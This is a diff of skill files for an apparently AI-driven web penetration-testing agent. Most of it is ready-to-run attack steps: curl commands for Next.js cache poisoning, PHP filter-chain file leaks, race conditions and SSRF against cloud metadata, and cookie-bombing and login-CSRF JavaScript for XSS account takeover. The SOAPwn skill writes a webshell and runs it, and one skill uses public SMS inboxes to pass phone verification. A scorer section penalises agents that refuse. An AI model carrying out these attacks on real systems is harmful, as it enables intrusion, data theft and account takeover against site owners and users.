-2. Send request with injected `x-now-route-matches` header:
+# Find SSR routes with aggressive cache headers
+curl -sD- "https://target.com/target-page" | rg "s-maxage|stale-while-revalidate"
 ```
-GET /target-page HTTP/1.1
-Host: target.com
-x-now-route-matches: 1
+
+**Checkpoint:** Must see `x-nextjs-cache` header (HIT/STALE/MISS) or `s-maxage` in response. If all routes return `private, no-cache`, cache poisoning is not viable.
+
+## Exploit
+
+### 1. Identify poisonable route
+Find SSR routes with `s-maxage=31536000, stale-while-revalidate` (not `private, no-cache`).
+
+### 2. Inject via x-now-route-matches header
+```bash
+curl -sD- "https://target.com/target-page" \
+  -H "x-now-route-matches: 1"
 ```
-3. Target `/_next/data/{buildID}/page.json` directly with same header
-4. If response contains user-controlled data (User-Agent, custom headers) AND `s-maxage` caching, the entry is poisoned for all visitors
-5. Leverage `stale-while-revalidate` window — periodically re-inject to maintain poisoned entry
+
+### 3. Target data endpoint directly
+```bash
+curl -sD- "https://target.com/_next/data/BUILD_ID/target-page.json" \
+  -H "x-now-route-matches: 1"
+```
+
+### 4. Verify poisoning
+```bash
+# Check if subsequent requests return poisoned content
+curl -s "https://target.com/target-page" | head -50
+# Look for x-nextjs-cache: HIT with attacker-controlled data
+```
+
+**Checkpoint:** Verify with a different session/IP that the poisoned response is served to other users. Single-user cache hits are not exploitable.
+
+### 5. Maintain poisoned entry
+During the `stale-while-revalidate` window, periodically re-inject to prevent cache refresh.
 
 ## Indicators
 - `x-nextjs-cache: HIT` on subsequent requests returning attacker-controlled data
 - Cached JSON endpoint (`/_next/data/`) contains injected content
-- Other users receive poisoned response (verify with different session/IP)
+- Other users receive poisoned response
 
 ## Chain With
 - web-cache-deception-path (path delimiter confusion + Next.js cache)

--- a/capabilities/web-security/skills/phone-verification/SKILL.md
+++ b/capabilities/web-security/skills/phone-verification/SKILL.md
@@ -1,29 +1,41 @@
 ---
 name: phone-verification
-description: Use when signup, login, recovery, or MFA testing requires SMS verification during authorized web security testing. Prefer free public inboxes first, then paid private numbers only when public numbers are blocked.
+description: Retrieve SMS verification codes from public or private phone number services. Use when signup, login, recovery, or MFA testing requires SMS verification during authorized web security testing.
 ---
 
 # Phone Verification
 
-Use the phone verification tools only when a target flow requires an SMS code.
-
 ## Workflow
 
-1. Start with free public numbers:
-   - `list_free_phone_numbers(country="all")`
-   - Use a relevant country filter when the target requires it.
-2. Submit the selected number in the target flow.
-3. Read the inbox:
-   - `read_phone_inbox(phone_number="...")`
-   - Use `sender_filter` when the inbox is noisy.
-4. If the target blocks public numbers, use a private-number provider:
-   - Retrieve the provider API key with `get_credential`.
-   - `request_private_number(...)`
-   - `poll_private_number(...)`
+### 1. Try free public numbers first
+```
+numbers = list_free_phone_numbers(country="all")
+```
+Use a relevant country filter when the target requires it (e.g., `country="US"`).
+
+### 2. Submit number in target flow
+Enter the selected number in the target's SMS verification field.
+
+### 3. Read the inbox
+```
+messages = read_phone_inbox(phone_number="+1234567890")
+```
+Use `sender_filter` when the inbox is noisy (e.g., `sender_filter="TargetApp"`).
+
+**Checkpoint:** If no SMS arrives after 30 seconds, retry `read_phone_inbox` up to 3 times with 10s intervals. If still empty, the public number may be blocked -- proceed to step 4.
+
+### 4. Escalate to private number if blocked
+```
+key = get_credential("sms_provider_api_key")
+number = request_private_number(provider="twilio", country="US", api_key=key)
+code = poll_private_number(number=number, timeout=60)
+```
+
+**Checkpoint:** After extracting the code, verify it is a valid format (typically 4-8 digits) before submitting to the target.
 
 ## Rules
 
-- Use only for authorized testing.
-- Public inboxes are shared. Do not use them for sensitive real accounts.
-- Do not use paid private numbers unless public numbers are rejected or rate-limited.
-- Store provider API keys with `store_credential`; do not place secrets in prompts or reports.
+- Use only for authorized testing
+- Public inboxes are shared -- do not use for sensitive real accounts
+- Do not use paid private numbers unless public numbers are rejected or rate-limited
+- Store provider API keys with `store_credential` -- never place secrets in prompts or reports

--- a/capabilities/web-security/skills/php-filter-chain-oracle/SKILL.md
+++ b/capabilities/web-security/skills/php-filter-chain-oracle/SKILL.md
@@ -11,8 +11,18 @@ description: Leak file contents via PHP filter chain error-based oracle using me
 - No direct file content output (blind LFI scenario)
 - Differential error responses observable (500 vs 200, different error messages)
 
-## Probe
-Exploit `convert.iconv` filter chains to cause memory exhaustion conditionally on file content:
+## Workflow
+
+### 1. Confirm php:// wrapper access
+```bash
+curl -s "https://target.com/endpoint?file=php://filter/resource=/etc/passwd"
+# vs
+curl -s "https://target.com/endpoint?file=/etc/passwd"
+```
+
+**Checkpoint:** If both return identical errors, the wrapper may be blocked. If different responses, the wrapper is processed.
+
+### 2. Exploit iconv filter chains as byte oracle
 1. Chain `convert.iconv.UTF8.UCS-4LE` filters to expand data exponentially
 2. Use `dechunk` filter as byte oracle — parses hex chars differently than non-hex
 3. If target byte is hex `[0-9a-f]`: `dechunk` processes it, chain continues → memory exhaustion → 500
@@ -23,6 +33,8 @@ Exploit `convert.iconv` filter chains to cause memory exhaustion conditionally o
 php://filter/convert.iconv.UTF8.UCS-4LE|convert.iconv.UTF8.UCS-4LE|...|dechunk/resource=/etc/passwd
 ```
 Automate with: `php_filter_chains_oracle_exploit` (github.com/synacktiv/php_filter_chains_oracle_exploit)
+
+**Checkpoint:** Verify the oracle is consistent by testing the same byte position 3 times. If responses differ across runs, network jitter or caching may interfere.
 
 ## Indicators
 - Differential response: 500 (memory limit) vs 200 for different filter chains

--- a/capabilities/web-security/skills/race-condition-single-packet/SKILL.md
+++ b/capabilities/web-security/skills/race-condition-single-packet/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: race-condition-single-packet
-description: Single-packet race conditions for exploiting multi-step flows via precise HTTP/2 request synchronization. Use when target has state-changing operations with limit checks, balance validation, or multi-step logic.
+description: Single-packet race conditions for exploiting multi-step flows via precise HTTP/2 request synchronization. Use when target has state-changing operations with limit checks, balance validation, or multi-step logic that may be vulnerable to concurrent execution.
 ---
 
 # Race Condition (Single-Packet Attack)
@@ -13,20 +13,33 @@ description: Single-packet race conditions for exploiting multi-step flows via p
 - Inventory/stock checks during purchase
 - Rate limit bypass on authentication endpoints
 
-## Probe
-**HTTP/2 single-packet technique:**
+## Technique
+
+**HTTP/2 single-packet:**
 1. Open one H2 connection to target
 2. Prepare N requests (e.g. 20x "apply coupon") but withhold final DATA frames
 3. Pause ~100ms to trigger Nagle's algorithm batching
 4. Send all END_STREAM frames simultaneously in one TCP packet
 5. All N requests arrive within ~1ms, defeating server-side locks
 
-**HTTP/1.1 last-byte sync:**
+```bash
+# Using Turbo Intruder (Burp extension) - single-packet mode:
+# In Turbo Intruder, select "race/single-packet-attack.py" template
+# Set request count to 20, configure the target request, and fire
+
+# Using curl for quick H2 multiplexing test:
+seq 1 20 | xargs -P 20 -I{} curl --http2 -s -o /dev/null -w "req={} status=%{http_code}\n" \
+  -X POST "https://target.com/api/apply-coupon" \
+  -H "Cookie: session=TOKEN" \
+  -d "code=PROMO123"
+```
+
+**HTTP/1.1 last-byte sync** (when H2 not available):
 1. Send N requests on N connections, withholding final byte of each
 2. Send all final bytes simultaneously
 3. Less precise (~4ms spread) but works without H2
 
-Tools: Turbo Intruder (single-packet attack mode), `curl --parallel` with H2.
+**Checkpoint:** After sending parallel requests, check the resource state (balance, coupon count, vote tally). If the operation applied N times instead of once, the race condition is confirmed.
 
 ## Indicators
 - Resource consumed N times from N parallel requests (coupon applied twice)

--- a/capabilities/web-security/skills/saas-provider-url-ssrf/SKILL.md
+++ b/capabilities/web-security/skills/saas-provider-url-ssrf/SKILL.md
@@ -1,0 +1,108 @@
+---
+name: saas-provider-url-ssrf
+description: "Two-phase SSRF via configurable provider URLs in SaaS integrations (SSO OIDC issuers, Git server base URLs, OAuth hosts). Use when target has configurable SSO, VCS, OAuth, SAML, SCIM, or data warehouse integrations where admin stores a URL and a separate flow triggers a server-side fetch."
+---
+
+# SaaS Provider URL SSRF
+
+SaaS platforms that allow admins to configure external provider URLs create stored SSRF primitives. The server-side fetch happens not at configuration time, but when a separate downstream flow triggers it.
+
+## Core Pattern
+
+```
+Phase 1: STORE -- Admin mutation saves attacker URL in config
+Phase 2: TRIGGER -- Separate flow makes server fetch from stored URL
+```
+
+The trigger and the store are different code paths, often different auth levels.
+
+## 1. Identify Stored URL Fields
+
+Search client-side JS for mutations/APIs that accept URL-like parameters:
+
+```
+issuer, customBaseUrl, host, baseUrl, metadataUrl, endpoint,
+providerUrl, serverUrl, instanceUrl, callbackUrl, webhookUrl,
+registryUrl, apiEndpoint, serviceUrl, idpUrl, samlMetadataUrl
+```
+
+Focus on configuration mutations, not transient request parameters. The URL must be persisted server-side.
+
+## 2. Store the Payload
+
+Set the URL to an OOB callback server:
+
+```bash
+# OIDC SSO issuer
+{"issuer": "https://ATTACKER.oob.example.com/callback", ...}
+
+# GitHub Enterprise Server base URL
+{"customBaseUrl": "https://ATTACKER.oob.example.com/callback", ...}
+```
+
+Verify the URL is stored by reading back the config.
+
+## 3. Find and Fire the Trigger
+
+| Stored URL | Trigger | Server Fetches | Method |
+|---|---|---|---|
+| OIDC issuer | SSO login flow | `{issuer}/.well-known/openid-configuration` | GET |
+| GHES customBaseUrl | OAuth code exchange | `{customBaseUrl}/login/oauth/access_token` | POST |
+| SAML metadata URL | SAML login initiation | `{metadataUrl}` | GET |
+| SCIM endpoint | Directory sync trigger | `{scimEndpoint}/Users` | GET/POST |
+| Webhook URL | Event trigger | `{webhookUrl}` | POST |
+| Databricks host | OAuth token exchange | `{host}/oidc/v1/token` | POST |
+
+### Trigger Authentication
+
+Some triggers require valid session state (nonces, PKCE verifiers). Get these from the same API before triggering.
+
+Some triggers are unauthenticated:
+```bash
+# OIDC SSO: anyone can visit /auth/{orgId}/sso -- no cookies needed
+```
+
+## 4. Confirm Impact
+
+### OOB Callback
+
+Look for: server IP (not client IP), library user-agent, internal headers.
+
+### Timing Oracle for Internal Services
+
+```bash
+# Reachable internal service: ~0.05-0.2s
+# Unreachable/filtered host: ~3-30s (TCP timeout)
+
+# Key internal targets:
+# 169.254.169.254 -- AWS IMDS
+# 169.254.170.2 -- AWS ECS task metadata
+# kubernetes.default.svc:443 -- K8s API
+# localhost:{port} -- co-located services
+```
+
+### POST vs GET SSRF
+
+POST-based SSRF (OAuth token exchange) is more impactful:
+- Attacker controls JSON body fields (client_id, client_secret, code)
+- Can interact with internal APIs that only accept POST
+
+## 5. Authorization Testing
+
+The store mutation is often admin-only. Always check lower roles:
+```bash
+# Test each SSRF-relevant mutation with non-admin session
+# FORBIDDEN = admin-only (PR:H in CVSS)
+# ISE = authorized and processed (potential lower-priv SSRF)
+```
+
+## Common Pitfalls
+
+- **Testing store without trigger**: URL is saved but no outbound request happens. You must find the separate trigger.
+- **Stale nonces**: OAuth state/nonce is single-use. Get a fresh one before each trigger.
+- **Confusing client-side routes with server-side handlers**: Check if the callback route is client-side or server-side in the source.
+
+## Related Skills
+
+- **ssrf-ip-filter-bypass** -- Bypass URL/IP validation on the fetch
+- **blind-ssrf-chains** -- Exploit SSRF when response is not returned

--- a/capabilities/web-security/skills/scorer-reference/SKILL.md
+++ b/capabilities/web-security/skills/scorer-reference/SKILL.md
@@ -1,26 +1,24 @@
 ---
 name: scorer-reference
-description: SDK rubrics and scorers relevant to web-security evaluation tasks
+description: SDK rubrics and scorers for web-security evaluation tasks. Use when configuring task.yaml verification, composing evaluation scorers, selecting rubrics for vulnerability classes, or building scoring pipelines for agent trajectories.
 ---
 
 # Scorer Reference
 
-SDK rubrics and scorers for evaluating web-security agent trajectories. Use when configuring `task.yaml` verification or composing evaluation scorers.
-
 ## Rubric-Based Scorers (LLM-judged)
 
-These judge an agent's full trajectory against a rubric. Use with `outcome_judge` or `script_and_judge` verification methods.
+Judge an agent's full trajectory against a rubric. Use with `outcome_judge` or `script_and_judge` verification methods.
 
 | Rubric | Verifies | When to use |
 |--------|----------|-------------|
-| `idor` | Cross-boundary object access (BOLA, OWASP API1) | IDOR/BOLA tasks — demands proof of cross-user data access, rejects pattern-only claims |
+| `idor` | Cross-boundary object access (BOLA, OWASP API1) | IDOR/BOLA tasks -- demands proof of cross-user data access |
 | `rce` | Arbitrary code execution achieved | Command injection, SSTI, deserialization tasks |
 | `data_exfiltration` | Sensitive data sent to external system | Tasks where agent should detect data leak paths |
 | `privilege_escalation` | Elevated privileges obtained | Vertical escalation, admin access tasks |
 
 ### Usage in task.yaml
 
-Rubric names do NOT auto-resolve in `task.yaml` — the `rubric` field requires **inline text**. Load the rubric content from the SDK bundled YAML files at `dreadnode/airt/data/rubrics/{name}.yaml`.
+Rubric names do NOT auto-resolve -- the `rubric` field requires **inline text**. Load from `dreadnode/airt/data/rubrics/{name}.yaml`:
 
 ```yaml
 verification:
@@ -36,8 +34,6 @@ verification:
 
 ### Usage in SDK code
 
-Short names resolve automatically in `llm_judge()`:
-
 ```python
 import dreadnode as dn
 
@@ -50,24 +46,37 @@ success = scorer & ~dn.scorers.credential_leakage()
 
 ## Detection Scorers (pattern-based, no LLM)
 
-Fast pattern matchers. Use for high-throughput screening or as composition building blocks.
+Fast pattern matchers for high-throughput screening or composition.
 
 | Scorer | Detects | Web-sec use |
 |--------|---------|-------------|
-| `credential_leakage` | Leaked API keys, tokens, passwords in output | Agent found creds, or verify agent didn't leak its own |
+| `credential_leakage` | Leaked API keys, tokens, passwords | Agent found creds, or verify agent didn't leak its own |
 | `detect_refusal` | "I cannot", "as an AI" refusal patterns | Agent refused to test |
-| `contains(pattern)` | Substring or regex match | `contains("FLAG{")` for CTF tasks, `contains(r"HTTP/\d\.\d 200")` for response validation |
+| `contains(pattern)` | Substring or regex match | `contains("FLAG{")` for CTF, `contains(r"HTTP/\d\.\d 200")` for validation |
 | `detect_sensitive_keywords` | Password, secret, API key mentions | Agent found sensitive data exposure |
 | `detect_unsafe_shell_content` | Dangerous shell commands | Agent found command injection |
-| `ssrf_exfil_detected` | SSRF patterns, internal IPs, cloud metadata URLs | Agent found SSRF or verify agent didn't accidentally exfiltrate |
+| `ssrf_exfil_detected` | SSRF patterns, internal IPs, cloud metadata URLs | Agent found SSRF |
+
+## Workflow: Configuring Scorers for a New Task
+
+1. **Identify vuln class** -- match task to rubric (IDOR, RCE, data exfil, privesc)
+2. **Load rubric text** -- read from `dreadnode/airt/data/rubrics/{name}.yaml`:
+   ```bash
+   cat $(python3 -c "import dreadnode; print(dreadnode.__path__[0])")/airt/data/rubrics/idor.yaml
+   ```
+3. **Paste into task.yaml** -- inline the rubric text in the `rubric:` field
+4. **Add detection scorers** -- layer pattern matchers for fast screening
+5. **Validate** -- run a test trajectory and confirm scoring behaves as expected
+
+**Checkpoint:** After step 3, verify the rubric text renders correctly: `yq '.verification.judge.rubric' task.yaml`
 
 ## Scorer Pairing Guide
 
 | Task type | Recommended scorers |
 |-----------|-------------------|
-| IDOR/BOLA | `idor` + `credential_leakage` (verify creds not leaked in report) |
+| IDOR/BOLA | `idor` + `credential_leakage` |
 | Command injection / RCE | `rce` + `detect_unsafe_shell_content` |
 | Data exfiltration | `data_exfiltration` + `ssrf_exfil_detected` |
 | Auth bypass | `privilege_escalation` |
-| General web pentest | `idor` or `rce` (match to vuln class) + `detect_refusal` (inverted — agent shouldn't refuse) |
+| General web pentest | Match rubric to vuln class + `detect_refusal` (inverted) |
 | CTF / flag capture | `contains("FLAG{")` or flag verification method |

--- a/capabilities/web-security/skills/self-xss-escalation/SKILL.md
+++ b/capabilities/web-security/skills/self-xss-escalation/SKILL.md
@@ -1,0 +1,101 @@
+---
+name: self-xss-escalation
+description: "Escalate self-XSS to full-impact XSS via login CSRF, cookie bombing, path-specific cookie precedence, and double-XSS chains. Use when you have XSS that only fires in the attacker's own session."
+---
+
+# Self-XSS Escalation
+
+You found XSS but it only triggers in your own authenticated session -- the payload is tied to your account data. This skill turns self-XSS into full account takeover.
+
+## Technique 1: OAuth Login CSRF
+
+Force the victim's browser into the attacker's session, where the XSS payload is waiting.
+
+```
+Step 1: Start OAuth flow for attacker account, capture authorization code
+        (Burp/Caido intercept the callback redirect)
+
+Step 2: Force victim to consume the code:
+        <img src="https://target.com/auth/callback?code=ATTACKER_CODE&state=ATTACKER_STATE">
+
+Step 3: Victim is now logged in as attacker; self-XSS payload fires
+```
+
+**State parameter bypass:**
+- Check if `state` is tied to session or just a CSRF token
+- If in a cookie, set it via cookie injection (XSS on subdomain, cookie tossing)
+- Some apps only validate presence, not value
+- Some apps skip validation entirely on the callback endpoint
+
+**Token/code lifetime:** OAuth codes are typically single-use, expire in 60s-600s. Move fast.
+
+## Technique 2: Cookie Bombing for Forced Logout
+
+Set enough cookies to exceed the server's header size limit (typically 8KB-16KB), causing 431 errors.
+
+```javascript
+function cookieBomb(path) {
+  for (let i = 0; i < 100; i++) {
+    document.cookie = `bomb${i}=${'A'.repeat(4000)}; Path=${path}; Domain=.target.com`;
+  }
+}
+cookieBomb('/');
+```
+
+| Server | Default header limit |
+|--------|---------------------|
+| nginx | 8KB |
+| Apache | 8KB |
+| IIS | 16KB |
+| Node.js | 16KB |
+
+## Technique 3: Path-Specific Cookie Precedence
+
+When multiple cookies share the same name, the browser sends the most-specific `Path` first. Most servers read the first value.
+
+```javascript
+// From XSS on subdomain or any same-site context
+document.cookie = `session=${ATTACKER_TOKEN}; Path=/app/vulnerable-page; Domain=.target.com`;
+// Victim visits /app/vulnerable-page -> attacker's session cookie sent first
+```
+
+## Technique 4: The Double-XSS Chain
+
+```
+Phase 1: SETUP
+  Store XSS payload in attacker's account
+  Capture OAuth code for attacker's account
+
+Phase 2: FORCE LOGIN (victim visits exploit page)
+  Cookie bomb victim's session -> 431 errors
+  Login CSRF with attacker's OAuth code
+  OR: Set path-specific attacker cookie
+
+Phase 3: XSS FIRES
+  Victim loads page with attacker's payload
+  Payload exfiltrates: localStorage tokens, cookies from other paths,
+  IndexedDB credentials, or performs actions as victim via fetch()
+```
+
+## COOP Blocking
+
+If `Cross-Origin-Opener-Policy: same-origin` is set, the exploit page loses window references after navigation. Bypasses:
+- Redirect-based flow (`<meta http-equiv="refresh">` or form auto-submit)
+- Cookie bombing and login CSRF work via `<img src>`, `<iframe>`, or `fetch()` fire-and-forget
+- COOP only applies to top-level documents opened via `window.open()`
+
+## Detection Checklist
+
+- [ ] Self-XSS exists (stored payload renders in attacker's own session)
+- [ ] OAuth login flow present
+- [ ] OAuth callback lacks `state` validation or `state` is predictable/injectable
+- [ ] No re-authentication prompt after session change
+- [ ] SameSite cookie attribute is Lax (not Strict)
+- [ ] Multiple subdomains exist (cookie tossing surface)
+- [ ] COOP header is absent or `unsafe-none`
+
+## Related Skills
+
+- **cspt-xss** -- CSPT as the self-XSS primitive being escalated
+- **oauth-flow-hijack** -- Code capture techniques for login CSRF
+- **csp-bypass** -- If CSP blocks the XSS payload execution

--- a/capabilities/web-security/skills/soapwn-wsdl-rce/SKILL.md
+++ b/capabilities/web-security/skills/soapwn-wsdl-rce/SKILL.md
@@ -1,93 +1,76 @@
 ---
 name: soapwn-wsdl-rce
-description: Exploit .NET WSDL proxy (HttpWebClientProtocol) to achieve arbitrary file write and RCE via SOAP service import. Use when .NET SOAP/WCF/ASMX endpoints detected.
+description: Exploit .NET WSDL proxy (HttpWebClientProtocol) to achieve arbitrary file write and RCE via SOAP service import -- a silent type cast failure during deserialization writes fetched content to disk as .aspx/.cshtml. Use when .NET SOAP/WCF/ASMX endpoints detected.
 ---
 
-# SOAPwn — .NET WSDL Proxy RCE
+# SOAPwn -- .NET WSDL Proxy RCE
 
 ## Pattern
 - .NET application consumes external SOAP services via WSDL import
-- `HttpWebClientProtocol` or `SoapHttpClientProtocol` used to generate client proxy
+- `HttpWebClientProtocol` or `SoapHttpClientProtocol` generates client proxy
 - Application fetches WSDL from user-influenced URL
 
-## Mechanism
-1. .NET's `HttpWebClientProtocol` accepts a URL to fetch a WSDL definition
-2. Supply a `file://` URI instead of `http://`
-3. A silent type cast failure occurs during deserialization
-4. The framework writes the fetched content to disk as `.aspx` or `.cshtml`
-5. Result: arbitrary file write → webshell → RCE
+## Exploit Workflow
 
-## Detection
-Look for indicators of .NET SOAP consumption:
-
-```
-*.asmx          — ASP.NET Web Services
-*.svc           — WCF Services
-?wsdl           — WSDL endpoint suffix
-?disco          — Discovery document
-/Service1.asmx?WSDL
-```
-
-Response headers:
-```http
-X-Powered-By: ASP.NET
-X-AspNet-Version: 4.0.30319
-Server: Microsoft-IIS/10.0
-```
-
-Body indicators:
-```xml
-<wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
-<soap:address location="..."/>
-```
-
-## Exploit Steps
-
-### 1. Confirm WSDL endpoint
+### 1. Detect SOAP/WCF endpoints
 ```bash
-curl -x localhost:8080 -k "https://target.com/Service.asmx?WSDL"
-```
-Look for valid WSDL XML response with service definitions.
+# Probe common SOAP endpoint patterns
+curl -x localhost:8080 -k -sD- "https://target.com/Service.asmx?WSDL" | head -20
+curl -x localhost:8080 -k -sD- "https://target.com/Service.svc?wsdl" | head -20
+curl -x localhost:8080 -k -sD- "https://target.com/Service.asmx?disco" | head -20
 
-### 2. Test URL parameter influence
-Find where the application imports external WSDL:
-```http
-POST /api/import-service HTTP/1.1
-Content-Type: application/json
-
-{"wsdlUrl": "http://attacker.com/evil.wsdl"}
-```
-Or via SOAP headers:
-```xml
-<wsdl:import namespace="http://target.com/" location="http://attacker.com/evil.wsdl"/>
+# Check for .NET indicators in headers
+curl -x localhost:8080 -k -sI "https://target.com/" | rg -i "x-powered-by|x-aspnet|server.*iis"
 ```
 
-### 3. Attempt file:// protocol
-```http
-POST /api/import-service HTTP/1.1
-Content-Type: application/json
+**Checkpoint:** Must see valid WSDL XML with `<wsdl:definitions>` and .NET response headers. If no WSDL endpoint found, this technique does not apply.
 
-{"wsdlUrl": "file:///C:/inetpub/wwwroot/shell.aspx"}
+### 2. Find user-influenced WSDL URL parameter
+```bash
+# Via JSON API
+curl -x localhost:8080 -k "https://target.com/api/import-service" \
+  -H "Content-Type: application/json" \
+  -d '{"wsdlUrl": "https://ATTACKER-OOB-SERVER/canary.wsdl"}'
+
+# Via SOAP import header
+curl -x localhost:8080 -k "https://target.com/Service.asmx" \
+  -H "Content-Type: text/xml" \
+  -d '<wsdl:import namespace="http://target.com/" location="https://ATTACKER-OOB-SERVER/canary.wsdl"/>'
 ```
 
-### 4. Craft malicious WSDL
-Host a WSDL that, when processed, writes a webshell:
+**Checkpoint:** Check OOB callback -- did the server fetch your URL? If no callback, the WSDL URL is not user-influenced.
+
+### 3. Test file:// protocol
+```bash
+curl -x localhost:8080 -k "https://target.com/api/import-service" \
+  -H "Content-Type: application/json" \
+  -d '{"wsdlUrl": "file:///C:/inetpub/wwwroot/test.txt"}'
+```
+
+### 4. Craft malicious WSDL and host on attacker server
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
   xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
   <wsdl:types>
     <xsd:schema>
-      <!-- Schema that triggers code generation to disk -->
+      <!-- Schema triggers code generation -- proxy class written to disk -->
     </xsd:schema>
   </wsdl:types>
-  <wsdl:service name="Evil">
-    <wsdl:port binding="tns:EvilBinding">
+  <wsdl:service name="Shell">
+    <wsdl:port binding="tns:ShellBinding">
       <soap:address location="file:///C:/inetpub/wwwroot/cmd.aspx"/>
     </wsdl:port>
   </wsdl:service>
 </wsdl:definitions>
 ```
+
+### 5. Verify write and access webshell
+```bash
+curl -x localhost:8080 -k "https://target.com/cmd.aspx?cmd=whoami"
+```
+
+**Checkpoint:** If webshell is not accessible, the write may have landed in a non-web-accessible path. Try alternative paths: `C:\inetpub\wwwroot\`, `C:\wwwroot\`, or use error messages to discover the actual web root. If .aspx execution is blocked, chain with `write-path-to-rce`.
 
 ## Prerequisites
 - Target runs .NET (IIS, ASP.NET)
@@ -95,5 +78,6 @@ Host a WSDL that, when processed, writes a webshell:
 - User can influence the WSDL URL parameter
 - `file://` protocol not blocked at network or application layer
 
-## Key Insight
-The vulnerability is in .NET's WSDL proxy generation pipeline — the silent cast failure during import means the framework doesn't validate the output path. This turns a seemingly benign "import service" feature into arbitrary file write with webshell potential.
+## Chain With
+- `write-path-to-rce` (if direct .aspx execution blocked, use framework view resolution)
+- `ssrf-redirect-loop` (if WSDL URL fetched server-side, chain with redirect for internal access)

--- a/capabilities/web-security/skills/ssrf-redirect-loop/SKILL.md
+++ b/capabilities/web-security/skills/ssrf-redirect-loop/SKILL.md
@@ -12,14 +12,31 @@ description: Upgrade blind SSRF to visible using HTTP redirect loops and error d
 - Need to prove impact beyond "blind" (e.g. reach metadata services)
 
 ## Probe
-1. Set up two attacker-controlled URLs that redirect to each other: `A -> B -> A` (infinite loop)
-2. Submit URL A as SSRF payload — server follows until redirect limit (20-30 hops)
-3. Observe: response time increases proportionally to redirect depth followed
-4. Now vary the chain: `A -> internal_target -> B -> A`
-5. Differential analysis: different internal targets produce different error types
-   - `169.254.169.254` → connection timeout vs auth error (reveals metadata service exists)
-   - Internal host → `NetworkException` vs `JSONParseException` (reveals service type)
-6. Error message content, timing, and HTTP status code all serve as oracle channels
+
+### 1. Confirm redirect following
+```bash
+# Set up redirect loop server (minimal Flask):
+# @app.route('/a') -> redirect('/b'), @app.route('/b') -> redirect('/a')
+# Submit loop URL as SSRF payload and measure timing
+time curl -s "https://target.com/fetch?url=https://ATTACKER.com/a" -o /dev/null
+# Compare with non-redirect URL timing as baseline
+time curl -s "https://target.com/fetch?url=https://ATTACKER.com/static" -o /dev/null
+```
+
+**Checkpoint:** If response time does NOT increase with the redirect loop, the server may not follow redirects. Try 301/302/307/308 variants. If none work, this technique is not applicable.
+
+### 2. Differential analysis
+```bash
+# Inject internal target mid-chain: A -> internal_target -> B -> A
+# Compare responses for different internal targets:
+curl -s "https://target.com/fetch?url=https://ATTACKER.com/redir?to=http://169.254.169.254/latest/meta-data/"
+curl -s "https://target.com/fetch?url=https://ATTACKER.com/redir?to=http://10.0.0.1:6379/"
+curl -s "https://target.com/fetch?url=https://ATTACKER.com/redir?to=http://localhost:9200/"
+```
+
+Different internal targets produce different error types, timing, or status codes — each serves as an oracle channel:
+- `169.254.169.254` → connection timeout vs auth error (reveals metadata service exists)
+- Internal host → `NetworkException` vs `JSONParseException` (reveals service type)
 
 ## Indicators
 - Response time scales with redirect chain depth (confirms redirect following)

--- a/capabilities/web-security/skills/ssti-error-based-detection/SKILL.md
+++ b/capabilities/web-security/skills/ssti-error-based-detection/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ssti-error-based-detection
-description: Error-based blind SSTI detection using polyglot payloads and error message differentials. Use when template engine suspected but injection appears blind.
+description: Error-based blind SSTI detection using polyglot payloads and error message differentials to fingerprint template engines. Use when template injection is suspected but output appears blind, or when you need to identify the template engine before escalation.
 ---
 
 # SSTI Error-Based Detection
@@ -11,25 +11,47 @@ description: Error-based blind SSTI detection using polyglot payloads and error 
 - Need to identify template engine before escalation
 - Time-based blind SSTI too slow or unreliable
 
-## Probe
-**Polyglot detector** (triggers distinct errors per engine):
-```
-${{<%[%'"}}%\.
-```
-**Engine-specific error probes** — observe error type to fingerprint:
-- Jinja2: `{{7*'7'}}` → `7777777` or `UndefinedError`
-- Twig: `{{7*7}}` → `49` or `Twig_Error_Syntax`
-- Freemarker: `${7*7}` → `49` or `ParseException`
-- Velocity: `#set($x=7*7)$x` → `49` or `MethodInvocationException`
-- ERB: `<%= 7*7 %>` → `49` or `SyntaxError`
-- Pebble: `{{7*7}}` → `49` or `PebbleException`
-- Smarty: `{7*7}` → `49` or `SmartyCompilerException`
+## Workflow
 
-Key insight: **error class names and stack traces reveal the engine** even when output is blind. `AttributeError` = Python (Jinja2/Mako). `NumberFormatException` = Java (Freemarker/Pebble).
+### 1. Send polyglot detector
+```bash
+# Triggers distinct errors per engine
+curl -x localhost:8080 -k "https://target.com/endpoint" \
+  -d 'input=${{<%[%'"}}%\.'
+```
+
+**Checkpoint:** Compare error response to a normal request. If error message changes, the input reaches a template engine.
+
+### 2. Fingerprint engine via error type
+```bash
+# Jinja2 (Python)
+curl -s "https://target.com/endpoint" -d "input={{7*'7'}}" | rg -i "UndefinedError|jinja2"
+
+# Twig (PHP)
+curl -s "https://target.com/endpoint" -d "input={{7*7}}" | rg -i "Twig_Error|twig"
+
+# Freemarker (Java)
+curl -s "https://target.com/endpoint" -d 'input=${7*7}' | rg -i "ParseException|freemarker"
+
+# ERB (Ruby)
+curl -s "https://target.com/endpoint" -d 'input=<%= 7*7 %>' | rg -i "SyntaxError|erb"
+
+# Velocity (Java)
+curl -s "https://target.com/endpoint" -d 'input=#set($x=7*7)$x' | rg -i "MethodInvocation|velocity"
+```
+
+**Checkpoint:** Error class names reveal the engine:
+- `AttributeError` / `jinja2.exceptions` = Python (Jinja2/Mako)
+- `NumberFormatException` / `freemarker.core` = Java (Freemarker/Pebble)
+- `Twig_Error_Syntax` / `SmartyCompilerException` = PHP (Twig/Smarty)
+- `SyntaxError` = Ruby (ERB)
+
+### 3. Confirm with evaluation probe
+If a probe returns `49` or `7777777`, output is not blind -- proceed directly to exploitation.
 
 ## Indicators
-- Different error types on different payloads → engine fingerprinted
-- Stack trace contains engine class names (e.g. `jinja2.exceptions`, `freemarker.core`)
+- Different error types on different payloads = engine fingerprinted
+- Stack trace contains engine class names
 - Error message includes partial evaluation result
 
 ## Chain With

--- a/capabilities/web-security/skills/subdomain-takeover-check/SKILL.md
+++ b/capabilities/web-security/skills/subdomain-takeover-check/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: subdomain-takeover-check
